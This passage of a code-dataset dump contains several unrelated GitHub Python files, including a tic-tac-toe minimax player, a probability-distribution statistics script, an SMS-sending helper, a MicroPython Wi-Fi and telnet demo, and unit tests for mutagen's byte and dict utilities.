0, 'bo', ms=8)\n\n # Calculate the second fixed point with your initial value\n x_fp_2 = my_fp_single(pars, 0.4)\n if check_fp_single(pars, x_fp_2):\n plt.plot(x_fp_2, 0, 'ro', ms=8)\n\n # Calculate the third fixed point with your initial value\n x_fp_3 = my_fp_single(pars, 0.9)\n if check_fp_single(pars, x_fp_3):\n plt.plot(x_fp_3, 0, 'yo', ms=8)\n\n 
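# display the dr/dt curve with every detected fixed point marked\n 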
plt.show()","repo_name":"ddinesan/Neuroscience","sub_path":"tutorials/W3D2_DynamicNetworks/solutions/W3D2_Tutorial1_Solution_37eb2320.py","file_name":"W3D2_Tutorial1_Solution_37eb2320.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6225196133","text":"import numpy as np\nimport random as rand\nimport math\n\nseed = input(\"Input a seed for the random numbers (blank is a random seed): \") \nif seed != \"\":\n np.random.seed(int(seed))\n rand.seed(int(seed))\n\ndef findMean(x): #finding the mean\n s = math.fsum(x)\n return s/(len(x))\n\ndef findVariance(x): #finding the variance\n s = findMean(x)\n s2 = 0\n for i in x: #for every float in x\n s2 += pow((i - s), 2) #add it to s2\n return (s2/(len(x) - 1))\n\ndef listToString(list):\n retval = \"\"\n for i in range(len(list)):\n retval += str(list[i])\n return retval\n\npoisson = np.random.poisson(lam=5, size=1000)\nexponential = [rand.expovariate(0.5) for i in range (1000)]\nnormal = [rand.gauss(10, 5) for i in range(1000)]\n\npoisson_mean = findMean(poisson)\nexponential_mean = findMean(exponential)\nnormal_mean = findMean(normal)\n\npoisson_variance = findVariance(poisson)\nexponential_variance = findVariance(exponential)\nnormal_variance = findVariance(normal)\n\npoisson_list = [\"Poisson -- Expected Mean: \", 5, \" | Actual Mean: \", poisson_mean, \" | Expected Variance: \", 5, \" | Actual Variance: \", poisson_variance]\nexponential_list = [\"\\nExponential -- Expected Mean: \", 1/0.5, \" | Actual Mean: \", exponential_mean, \" | Expected Variance: \", 1/(0.5**2), \"| Actual Variance: \", exponential_variance]\nnormal_list = [\"\\nNormal -- Expected Mean: \", 10, \" | Actual Mean: \", normal_mean, \" | Expected Variance: \", 5**2, \" | Actual Variance: \", normal_variance]\n\nfile_thing = open(\"distribution_expected_and_actual.txt\", \"w\")\nfile_thing.write(listToString(poisson_list))\nfile_thing.write(listToString(exponential_list))\nfile_thing.write(listToString(normal_list))\nfile_thing.close()\n\nprint(listToString(poisson_list))\nprint(listToString(exponential_list))\nprint(listToString(normal_list))\n\nfile_thing","repo_name":"viabard/biological-models-in-python","sub_path":"Week 4 - Distributions and Weasel/week4_part1.py","file_name":"week4_part1.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38404415274","text":"def get_data():\n data = {\n \"data\": {\n \"type\": \"content\",\n \"id\": \"rwoA7p5\",\n \"attributes\": {\n \"content-type\": \"Course\",\n \"external-id\": \"Course:24\",\n \"title\": \"Public Speaking\",\n \"summary\": \"Learn how to give an impressive speech in the Public Speaking - Communicating with Confidence course, delivered by award winning presenter TJ Walker.\",\n \"url\": \"https://www.goskills.com/Course/Public-Speaking?utm_source=degreed\",\n \"format\": None,\n \"is-obsolete\": False,\n \"image-url\": \"https://www.goskills.com/blobs/bags/59/new-share-card.png\",\n \"language\": \"en\",\n \"duration\": 9790.0,\n \"duration-type\": \"Seconds\",\n \"provider\": None,\n \"is-internal\": True,\n \"owner\": None,\n \"created-at\": \"2022-02-16T20:41:15.6960031\",\n \"modified-at\": \"2022-02-16T20:41:15.664766\",\n \"degreed-url\": \"https://betatest.degreed.com/courses/?d=JP14N760OP\",\n },\n \"links\": {\"self\": \"https://api.betatest.degreed.com/api/v2/content/rwoA7p5\"},\n }\n }\n return 
data\n\n\ndef get_final_entity_details():\n data = {\n \"entity_id\": \"rwoA7p5\",\n \"cta_label\": \"Course\",\n \"cta_url\": \"https://betatest.degreed.com/courses/?d=JP14N760OP\",\n \"custom_sections\": [],\n \"description\": 'Learn how to give an impressive speech in the Public Speaking - Communicating with Confidence course, delivered by award winning presenter TJ Walker. ',\n \"fields\": [\n {\"name\": \"Provider\", \"value\": \"Internal\"},\n {\"name\": \"Duration Hours\", \"value\": 2.72},\n {\"name\": \"Content Type\", \"value\": \"Course\"},\n {\"name\": \"Language\", \"value\": \"en\"},\n {\"name\": \"Owner\", \"value\": \"NA\"},\n {\"name\": \"Published Date\", \"value\": \"16/02/2022\"},\n {\"name\": \"Last Modified Date\", \"value\": \"16/02/2022\"},\n ],\n \"image_url\": \"https://www.goskills.com/blobs/bags/59/new-share-card.png\",\n \"last_modified_ts\": 1645044075,\n \"metadata\": [],\n \"source_name\": \"Internal\",\n \"subtitle\": \"\",\n \"tags\": \"\",\n \"title\": \"Public Speaking\",\n }\n return data\n","repo_name":"payls/Degreed-App","sub_path":"tests/fake_data/entity_details.py","file_name":"entity_details.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41082186537","text":"\"\"\"\nTic Tac Toe player\n\"\"\"\nimport copy\nimport math\nimport random\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\ndef initial_state():\n \"\"\"\n :return: starting state of the board\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\ndef player(board):\n \"\"\"\n :param board:\n :return: player who has the next turn on a given board\n \"\"\"\n # if the board is empty it's X's turn\n if board == initial_state():\n return X\n # count how many Xs and Os in the board\n total_Xs = 0\n total_Os = 0\n for row in board:\n total_Xs += row.count(\"X\")\n total_Os += row.count(\"O\")\n # Xs more than Os it's O's turn\n if total_Xs > total_Os:\n return O\n # else it's X's turn\n else:\n return X\n\ndef actions(board):\n \"\"\"\n :param board:\n :return: set of all possible actions (i, j) available on the board\n \"\"\"\n # create an empty set to hold tuples of possible moves\n possible_moves = set()\n # iterate through the board, for every empty cell add its coordinate to the set\n for row in range(len(board)):\n for col in range(len(board)):\n if board[row][col] is None:\n possible_moves.add((row, col))\n # return the set\n return possible_moves\n\ndef result(board, action):\n \"\"\"\n :param board:\n :param action: an action (i, j)\n :return: the board that results from making the move action on the board\n \"\"\"\n # validate the passed action (check the bounds before indexing the board)\n if action[0] >= 3 or action[1] >= 3 or board[action[0]][action[1]] != EMPTY:\n raise Exception(\"Invalid action!\")\n # proceed with caution inside the try block\n try:\n # create a deep copy to avoid modifying the original board\n copy_board = copy.deepcopy(board)\n turn = player(board)\n copy_board[action[0]][action[1]] = turn\n # return the board after applying the action\n return copy_board\n except Exception as e:\n print(f\"Oops, there is something wrong: {e}\")\n\n\ndef winner(board):\n \"\"\"\n :param board:\n :return: the winner of the game, if there is one\n \"\"\"\n # check horizontally\n for row in board:\n if row.count(X) == 3:\n return X\n elif row.count(O) == 3:\n return O\n # check diagonally\n left_diagonal = [board[i][i] for i in range(len(board))]\n right_diagonal = [board[i][2 - i] for i in 
range(len(board))]\n if left_diagonal.count(O) == 3 or right_diagonal.count(O) == 3:\n return O\n if left_diagonal.count(X) == 3 or right_diagonal.count(X) == 3:\n return X\n\n # check vertically\n cols = [[board[0][i], board[1][i], board[2][i]] for i in range(len(board))]\n for col in cols:\n if col.count(X) == 3:\n return X\n elif col.count(O) == 3:\n return O\n # otherwise return None\n return None\n\ndef terminal(board):\n \"\"\"\n :param board:\n :return: True if game is over, False otherwise\n \"\"\"\n # A True value returned from winner() means the game is over\n if winner(board):\n return True\n # if the board is completely filled with Xs and Os, the game is over\n return all(True if row.count(EMPTY) == 0 else False for row in board)\n\ndef utility(board):\n \"\"\"\n :param board:\n :return: 1 if X has won the game, -1 if O has won, 0 otherwise\n \"\"\"\n # X wins\n if winner(board) == X:\n return 1\n # O wins\n if winner(board) == O:\n return -1\n # No one wins\n else:\n return 0\n\ndef minimax(board):\n \"\"\"\n :param board:\n :return: the optimal action for the current player on the board\n \"\"\"\n # if the board is empty return any action to apply\n if board == initial_state():\n return list(actions(board))[random.randrange(0, 9)]\n # if the game is over return None\n elif terminal(board):\n return None\n # lists for moves and their value of state\n O_moves = []\n X_moves = []\n # if it's X's turn go here\n if player(board) == X:\n # iterate through all possible actions\n for action in actions(board):\n # append every action possible with its value of state\n X_moves.append((MIN_VALUE(result(board, action)), action))\n # sort the list then choose the last action of the list as it has the highest value of state\n return sort(X_moves)[-1][1]\n # if it's O's turn go here\n elif player(board) == O:\n # iterate through all possible actions\n for action in actions(board):\n # append every action possible with its value of state\n O_moves.append((MAX_VALUE(result(board, action)), action))\n # sort the list then choose the first action of the list as it has the smallest value of state\n return sort(O_moves)[0][1]\n\n\n\ndef MAX_VALUE(board):\n \"\"\"\n :param board: current board\n :return: the value of the state after terminating the recursive process\n \"\"\"\n # if the board is in terminal state then return the utility of that board\n if terminal(board):\n return utility(board)\n # set v to the lowest value possible so we can be sure that anything would be greater\n v = -math.inf\n # keep iterating through the actions recursively with MIN_VALUE until reaching the terminal state\n for action in actions(board):\n v = max(v, MIN_VALUE(result(board, action)))\n return v\n\ndef MIN_VALUE(board):\n \"\"\"\n :param board: current board\n :return: the value of the state after terminating the recursive process\n \"\"\"\n # if the board is in terminal state then return the utility of that board\n if terminal(board):\n return utility(board)\n # set v to the highest value possible so we can be sure that anything would be smaller\n v = math.inf\n # keep iterating through the actions recursively with MIN_VALUE until reaching the terminal state\n for action in actions(board):\n v = min(v, MAX_VALUE(result(board, action)))\n return v\n\ndef sort(lst):\n \"\"\"\n :param lst: a list\n :return: a sorted copy of the list\n \"\"\"\n sorted_list = sorted(lst)\n return 
sorted_list\n\n\n","repo_name":"ali-almousa/CS50-AI-Project0-tictactoe","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70351986987","text":"#!/usr/bin/env python \n#-*- coding:utf-8 -*-\n\nimport requests\nfrom hashlib import md5\nimport time\nimport base64\nimport json\n\n\n# account id\nACCOUNT =\"\"\n# app id\nAPP_ID = \"\"\n# auth token\nAUTH_TOKEN = \"\"\n\nurl = \"https://app.cloopen.com:8883/2013-12-26/Accounts/{}/SMS/TemplateSMS\".format(ACCOUNT)\n\n\n\ndef send_msg(iphone,templateId,data):\n '''\n iphone: the recipient's phone number\n templateId: the SMS template id\n data: list of values to fill into the template\n returns True if the send succeeded, False otherwise\n '''\n\n time_str = time.strftime(\"%Y%m%d%H%M%S\")\n\n SigParameter_str = ACCOUNT+AUTH_TOKEN+time_str\n # print(SigParameter_str)\n\n SigParameter = md5(SigParameter_str.encode(encoding=\"utf-8\"))\n SigParameter = SigParameter.hexdigest().upper()\n\n params = {\"sig\":SigParameter}\n\n Authorization_str = ACCOUNT+\":\"+time_str\n Authorization = base64.b64encode(Authorization_str.encode(\"utf-8\")).decode(\"utf-8\")\n\n headers = {\"Accept\":\"application/json\",\n \"Content-Type\":\"application/json;charset=utf-8\",\n \"Content-Length\":\"256\",\n \"Authorization\":Authorization}\n\n\n data = {\n \"to\":iphone,\n \"appId\":APP_ID,\n \"templateId\":templateId,\n \"datas\":data\n }\n resp = requests.post(url,params=params,headers=headers,json=data)\n return json.loads(resp.text)[\"statusCode\"]==\"000000\"\n\n\n","repo_name":"masongjie/tools","sub_path":"send_msg.py","file_name":"send_msg.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34985823397","text":"# Python program to calculate the sum of the first n natural numbers\n\n# take input from user\nnum = int(input(\"Enter the value of n: \"))\nhold = num\nsum = 0\n\nif num < 0:\n print(\"Enter a whole positive number!\")\nelse:\n while num > 0:\n sum = sum + num\n num = num - 1\n \n # displaying output\n print(\"Sum of first\", hold, \"natural numbers is: \", sum)\n","repo_name":"Rahul-CS19/Python","sub_path":"Assignment1 Day2/Sum.py","file_name":"Sum.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18569748698","text":"from helpers import *\n\nlines = getlines(4)\ntotal = 0\ntotal2 = 0\n\npairs = []\n\nfor line in lines:\n\ta1,a2,b1,b2, = getparts(line, \"-,\", \"iiii\")\n\tif (b1 >= a1 and b2 <= a2) or (a1 >= b1 and a2 <= b2):\n\t\ttotal += 1\n\n\tif b2 >= a1 and b1 <= a2:\n\t\ttotal2 += 1\n\nprint(total)\nprint(total2)\n","repo_name":"yokljo/aoc2022","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74636843626","text":"import socket\nimport gc\nimport utime\n\ndef connect_to_ap():\n import network\n wlan = network.WLAN(network.STA_IF)\n wlan.active(True)\n wlan.isconnected()\n if not wlan.isconnected():\n print('connecting to network')\n wlan.connect('L&F','41992549713')\n while not wlan.isconnected():\n utime.sleep(1) \n pass\n print('network config', wlan.ifconfig())\n\ndef starwars():\n gc.collect()\n addr_info = socket.getaddrinfo(\"towel.blinkenlights.nl\",23)\n addr = addr_info[0][-1]\n s = socket.socket()\n s.connect(addr)\n while True:\n data = s.recv(1000)\n 
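# towel.blinkenlights.nl streams the ASCII Star Wars animation over telnet (port 23)\n 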
print(str(data,'utf8'),end='')\n\ndef main():\n connect_to_ap()\n starwars()\n\n\nif __name__ == '__main__':\n main()\n \nexit()\n\n","repo_name":"leohfigueiredo/ESP32","sub_path":"ESP32 MicroPython/IOT-Using-NodeMCU-MicroPython-master/Lab6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30173798136","text":"from mutagen._util import DictMixin, cdata, insert_bytes, delete_bytes\nfrom mutagen._util import decode_terminated, split_escape, dict_match, enum\nfrom mutagen._util import BitReader, BitReaderError, set_win32_unicode_argv\nfrom mutagen._compat import text_type, itervalues, iterkeys, iteritems, PY2, \\\n cBytesIO, xrange\nfrom tests import TestCase\nimport random\nimport sys\nimport os\nimport mmap\n\ntry:\n import fcntl\nexcept ImportError:\n fcntl = None\n\n\nclass FDict(DictMixin):\n\n def __init__(self):\n self.__d = {}\n self.keys = self.__d.keys\n\n def __getitem__(self, *args):\n return self.__d.__getitem__(*args)\n\n def __setitem__(self, *args):\n return self.__d.__setitem__(*args)\n\n def __delitem__(self, *args):\n return self.__d.__delitem__(*args)\n\n\nclass TDictMixin(TestCase):\n\n def setUp(self):\n self.fdict = FDict()\n self.rdict = {}\n self.fdict[\"foo\"] = self.rdict[\"foo\"] = \"bar\"\n\n def test_getsetitem(self):\n self.failUnlessEqual(self.fdict[\"foo\"], \"bar\")\n self.failUnlessRaises(KeyError, self.fdict.__getitem__, \"bar\")\n\n def test_has_key_contains(self):\n self.failUnless(\"foo\" in self.fdict)\n self.failIf(\"bar\" in self.fdict)\n if PY2:\n self.failUnless(self.fdict.has_key(\"foo\"))\n self.failIf(self.fdict.has_key(\"bar\"))\n\n def test_iter(self):\n self.failUnlessEqual(list(iter(self.fdict)), [\"foo\"])\n\n def test_clear(self):\n self.fdict.clear()\n self.rdict.clear()\n self.failIf(self.fdict)\n\n def test_keys(self):\n self.failUnlessEqual(list(self.fdict.keys()), list(self.rdict.keys()))\n self.failUnlessEqual(\n list(iterkeys(self.fdict)), list(iterkeys(self.rdict)))\n\n def test_values(self):\n self.failUnlessEqual(\n list(self.fdict.values()), list(self.rdict.values()))\n self.failUnlessEqual(\n list(itervalues(self.fdict)), list(itervalues(self.rdict)))\n\n def test_items(self):\n self.failUnlessEqual(\n list(self.fdict.items()), list(self.rdict.items()))\n self.failUnlessEqual(\n list(iteritems(self.fdict)), list(iteritems(self.rdict)))\n\n def test_pop(self):\n self.failUnlessEqual(self.fdict.pop(\"foo\"), self.rdict.pop(\"foo\"))\n self.failUnlessRaises(KeyError, self.fdict.pop, \"woo\")\n\n def test_pop_bad(self):\n self.failUnlessRaises(TypeError, self.fdict.pop, \"foo\", 1, 2)\n\n def test_popitem(self):\n self.failUnlessEqual(self.fdict.popitem(), self.rdict.popitem())\n self.failUnlessRaises(KeyError, self.fdict.popitem)\n\n def test_update_other(self):\n other = {\"a\": 1, \"b\": 2}\n self.fdict.update(other)\n self.rdict.update(other)\n\n def test_update_other_is_list(self):\n other = [(\"a\", 1), (\"b\", 2)]\n self.fdict.update(other)\n self.rdict.update(dict(other))\n\n def test_update_kwargs(self):\n self.fdict.update(a=1, b=2)\n # Ironically, the *real* dict doesn't support this on Python 2.3\n other = {\"a\": 1, \"b\": 2}\n self.rdict.update(other)\n\n def test_setdefault(self):\n self.fdict.setdefault(\"foo\", \"baz\")\n self.rdict.setdefault(\"foo\", \"baz\")\n self.fdict.setdefault(\"bar\", \"baz\")\n self.rdict.setdefault(\"bar\", \"baz\")\n\n def test_get(self):\n 
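# get should mirror dict.get, both with and without a default value\n 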
self.failUnlessEqual(self.rdict.get(\"a\"), self.fdict.get(\"a\"))\n self.failUnlessEqual(\n self.rdict.get(\"a\", \"b\"), self.fdict.get(\"a\", \"b\"))\n self.failUnlessEqual(self.rdict.get(\"foo\"), self.fdict.get(\"foo\"))\n\n def test_repr(self):\n self.failUnlessEqual(repr(self.rdict), repr(self.fdict))\n\n def test_len(self):\n self.failUnlessEqual(len(self.rdict), len(self.fdict))\n\n def tearDown(self):\n self.failUnlessEqual(self.fdict, self.rdict)\n self.failUnlessEqual(self.rdict, self.fdict)\n\n\nclass Tcdata(TestCase):\n\n ZERO = staticmethod(lambda s: b\"\\x00\" * s)\n LEONE = staticmethod(lambda s: b\"\\x01\" + b\"\\x00\" * (s - 1))\n BEONE = staticmethod(lambda s: b\"\\x00\" * (s - 1) + b\"\\x01\")\n NEGONE = staticmethod(lambda s: b\"\\xff\" * s)\n\n def test_char(self):\n self.failUnlessEqual(cdata.char(self.ZERO(1)), 0)\n self.failUnlessEqual(cdata.char(self.LEONE(1)), 1)\n self.failUnlessEqual(cdata.char(self.BEONE(1)), 1)\n self.failUnlessEqual(cdata.char(self.NEGONE(1)), -1)\n self.assertTrue(cdata.char is cdata.int8)\n self.assertTrue(cdata.to_char is cdata.to_int8)\n self.assertTrue(cdata.char_from is cdata.int8_from)\n\n def test_char_from_to(self):\n self.assertEqual(cdata.to_char(-2), b\"\\xfe\")\n self.assertEqual(cdata.char_from(b\"\\xfe\"), (-2, 1))\n self.assertEqual(cdata.char_from(b\"\\x00\\xfe\", 1), (-2, 2))\n self.assertRaises(cdata.error, cdata.char_from, b\"\\x00\\xfe\", 3)\n\n def test_uchar(self):\n self.failUnlessEqual(cdata.uchar(self.ZERO(1)), 0)\n self.failUnlessEqual(cdata.uchar(self.LEONE(1)), 1)\n self.failUnlessEqual(cdata.uchar(self.BEONE(1)), 1)\n self.failUnlessEqual(cdata.uchar(self.NEGONE(1)), 255)\n self.assertTrue(cdata.uchar is cdata.uint8)\n self.assertTrue(cdata.to_uchar is cdata.to_uint8)\n self.assertTrue(cdata.uchar_from is cdata.uint8_from)\n\n def test_short(self):\n self.failUnlessEqual(cdata.short_le(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.short_le(self.LEONE(2)), 1)\n self.failUnlessEqual(cdata.short_le(self.BEONE(2)), 256)\n self.failUnlessEqual(cdata.short_le(self.NEGONE(2)), -1)\n self.assertTrue(cdata.short_le is cdata.int16_le)\n\n self.failUnlessEqual(cdata.short_be(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.short_be(self.LEONE(2)), 256)\n self.failUnlessEqual(cdata.short_be(self.BEONE(2)), 1)\n self.failUnlessEqual(cdata.short_be(self.NEGONE(2)), -1)\n self.assertTrue(cdata.short_be is cdata.int16_be)\n\n def test_ushort(self):\n self.failUnlessEqual(cdata.ushort_le(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.ushort_le(self.LEONE(2)), 1)\n self.failUnlessEqual(cdata.ushort_le(self.BEONE(2)), 2 ** 16 >> 8)\n self.failUnlessEqual(cdata.ushort_le(self.NEGONE(2)), 65535)\n self.assertTrue(cdata.ushort_le is cdata.uint16_le)\n\n self.failUnlessEqual(cdata.ushort_be(self.ZERO(2)), 0)\n self.failUnlessEqual(cdata.ushort_be(self.LEONE(2)), 2 ** 16 >> 8)\n self.failUnlessEqual(cdata.ushort_be(self.BEONE(2)), 1)\n self.failUnlessEqual(cdata.ushort_be(self.NEGONE(2)), 65535)\n self.assertTrue(cdata.ushort_be is cdata.uint16_be)\n\n def test_int(self):\n self.failUnlessEqual(cdata.int_le(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.int_le(self.LEONE(4)), 1)\n self.failUnlessEqual(cdata.int_le(self.BEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.int_le(self.NEGONE(4)), -1)\n self.assertTrue(cdata.int_le is cdata.int32_le)\n\n self.failUnlessEqual(cdata.int_be(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.int_be(self.LEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.int_be(self.BEONE(4)), 1)\n 
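# a signed int of all 0xff bytes decodes to -1 in two's complement\n 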
self.failUnlessEqual(cdata.int_be(self.NEGONE(4)), -1)\n self.assertTrue(cdata.int_be is cdata.int32_be)\n\n def test_uint(self):\n self.failUnlessEqual(cdata.uint_le(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.uint_le(self.LEONE(4)), 1)\n self.failUnlessEqual(cdata.uint_le(self.BEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.uint_le(self.NEGONE(4)), 2 ** 32 - 1)\n self.assertTrue(cdata.uint_le is cdata.uint32_le)\n\n self.failUnlessEqual(cdata.uint_be(self.ZERO(4)), 0)\n self.failUnlessEqual(cdata.uint_be(self.LEONE(4)), 2 ** 32 >> 8)\n self.failUnlessEqual(cdata.uint_be(self.BEONE(4)), 1)\n self.failUnlessEqual(cdata.uint_be(self.NEGONE(4)), 2 ** 32 - 1)\n self.assertTrue(cdata.uint_be is cdata.uint32_be)\n\n def test_longlong(self):\n self.failUnlessEqual(cdata.longlong_le(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.longlong_le(self.LEONE(8)), 1)\n self.failUnlessEqual(cdata.longlong_le(self.BEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.longlong_le(self.NEGONE(8)), -1)\n self.assertTrue(cdata.longlong_le is cdata.int64_le)\n\n self.failUnlessEqual(cdata.longlong_be(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.longlong_be(self.LEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.longlong_be(self.BEONE(8)), 1)\n self.failUnlessEqual(cdata.longlong_be(self.NEGONE(8)), -1)\n self.assertTrue(cdata.longlong_be is cdata.int64_be)\n\n def test_ulonglong(self):\n self.failUnlessEqual(cdata.ulonglong_le(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.ulonglong_le(self.LEONE(8)), 1)\n self.failUnlessEqual(cdata.longlong_le(self.BEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.ulonglong_le(self.NEGONE(8)), 2 ** 64 - 1)\n self.assertTrue(cdata.ulonglong_le is cdata.uint64_le)\n\n self.failUnlessEqual(cdata.ulonglong_be(self.ZERO(8)), 0)\n self.failUnlessEqual(cdata.ulonglong_be(self.LEONE(8)), 2 ** 64 >> 8)\n self.failUnlessEqual(cdata.longlong_be(self.BEONE(8)), 1)\n self.failUnlessEqual(cdata.ulonglong_be(self.NEGONE(8)), 2 ** 64 - 1)\n self.assertTrue(cdata.ulonglong_be is cdata.uint64_be)\n\n def test_invalid_lengths(self):\n self.failUnlessRaises(cdata.error, cdata.char, b\"\")\n self.failUnlessRaises(cdata.error, cdata.uchar, b\"\")\n self.failUnlessRaises(cdata.error, cdata.int_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.longlong_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.uint_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.ulonglong_le, b\"\")\n self.failUnlessRaises(cdata.error, cdata.int_be, b\"\")\n self.failUnlessRaises(cdata.error, cdata.longlong_be, b\"\")\n self.failUnlessRaises(cdata.error, cdata.uint_be, b\"\")\n self.failUnlessRaises(cdata.error, cdata.ulonglong_be, b\"\")\n\n def test_test(self):\n self.failUnless(cdata.test_bit((1), 0))\n self.failIf(cdata.test_bit(1, 1))\n\n self.failUnless(cdata.test_bit(2, 1))\n self.failIf(cdata.test_bit(2, 0))\n\n v = (1 << 12) + (1 << 5) + 1\n self.failUnless(cdata.test_bit(v, 0))\n self.failUnless(cdata.test_bit(v, 5))\n self.failUnless(cdata.test_bit(v, 12))\n self.failIf(cdata.test_bit(v, 3))\n self.failIf(cdata.test_bit(v, 8))\n self.failIf(cdata.test_bit(v, 13))\n\n\nclass FileHandling(TestCase):\n def file(self, contents):\n import tempfile\n temp = tempfile.TemporaryFile()\n temp.write(contents)\n temp.flush()\n temp.seek(0)\n return temp\n\n def read(self, fobj):\n fobj.seek(0, 0)\n return fobj.read()\n\n def test_insert_into_empty(self):\n o = self.file(b'')\n insert_bytes(o, 8, 0)\n self.assertEquals(b'\\x00' * 8, self.read(o))\n\n def test_insert_before_one(self):\n o = 
self.file(b'a')\n insert_bytes(o, 8, 0)\n self.assertEquals(b'a' + b'\\x00' * 7 + b'a', self.read(o))\n\n def test_insert_after_one(self):\n o = self.file(b'a')\n insert_bytes(o, 8, 1)\n self.assertEquals(b'a' + b'\\x00' * 8, self.read(o))\n\n def test_smaller_than_file_middle(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 4, 4)\n self.assertEquals(b'abcdefghefghij', self.read(o))\n\n def test_smaller_than_file_to_end(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 4, 6)\n self.assertEquals(b'abcdefghijghij', self.read(o))\n\n def test_smaller_than_file_across_end(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 4, 8)\n self.assertEquals(b'abcdefghij\\x00\\x00ij', self.read(o))\n\n def test_smaller_than_file_at_end(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 3, 10)\n self.assertEquals(b'abcdefghij\\x00\\x00\\x00', self.read(o))\n\n def test_smaller_than_file_at_beginning(self):\n o = self.file(b'abcdefghij')\n insert_bytes(o, 3, 0)\n self.assertEquals(b'abcabcdefghij', self.read(o))\n\n def test_zero(self):\n o = self.file(b'abcdefghij')\n self.assertRaises((AssertionError, ValueError), insert_bytes, o, 0, 1)\n\n def test_negative(self):\n o = self.file(b'abcdefghij')\n self.assertRaises((AssertionError, ValueError), insert_bytes, o, 8, -1)\n\n def test_delete_one(self):\n o = self.file(b'a')\n delete_bytes(o, 1, 0)\n self.assertEquals(b'', self.read(o))\n\n def test_delete_first_of_two(self):\n o = self.file(b'ab')\n delete_bytes(o, 1, 0)\n self.assertEquals(b'b', self.read(o))\n\n def test_delete_second_of_two(self):\n o = self.file(b'ab')\n delete_bytes(o, 1, 1)\n self.assertEquals(b'a', self.read(o))\n\n def test_delete_third_of_two(self):\n o = self.file(b'ab')\n self.assertRaises(AssertionError, delete_bytes, o, 1, 2)\n\n def test_delete_middle(self):\n o = self.file(b'abcdefg')\n delete_bytes(o, 3, 2)\n self.assertEquals(b'abfg', self.read(o))\n\n def test_delete_across_end(self):\n o = self.file(b'abcdefg')\n self.assertRaises(AssertionError, delete_bytes, o, 4, 8)\n\n def test_delete_zero(self):\n o = self.file(b'abcdefg')\n self.assertRaises(AssertionError, delete_bytes, o, 0, 3)\n\n def test_delete_negative(self):\n o = self.file(b'abcdefg')\n self.assertRaises(AssertionError, delete_bytes, o, 4, -8)\n\n def test_insert_6106_79_51760(self):\n # This appears to be due to ANSI C limitations in read/write on rb+\n # files. The problematic behavior only showed up in our mmap fallback\n # code for transfers of this or similar sizes.\n data = u''.join(map(text_type, range(12574))) # 51760 bytes\n data = data.encode(\"ascii\")\n o = self.file(data)\n insert_bytes(o, 6106, 79)\n self.failUnless(data[:6106 + 79] + data[79:] == self.read(o))\n\n def test_delete_6106_79_51760(self):\n # This appears to be due to ANSI C limitations in read/write on rb+\n # files. The problematic behavior only showed up in our mmap fallback\n # code for transfers of this or similar sizes.\n data = u''.join(map(text_type, range(12574))) # 51760 bytes\n data = data.encode(\"ascii\")\n o = self.file(data[:6106 + 79] + data[79:])\n delete_bytes(o, 6106, 79)\n self.failUnless(data == self.read(o))\n\n # Generate a bunch of random insertions, apply them, delete them,\n # and make sure everything is still correct.\n #\n # The num_runs and num_changes values are tuned to take about 10s\n # on my laptop, or about 30 seconds since we have 3 variations\n # on insert/delete_bytes brokenness. If I ever get a faster\n # laptop, it's probably a good idea to increase them. 
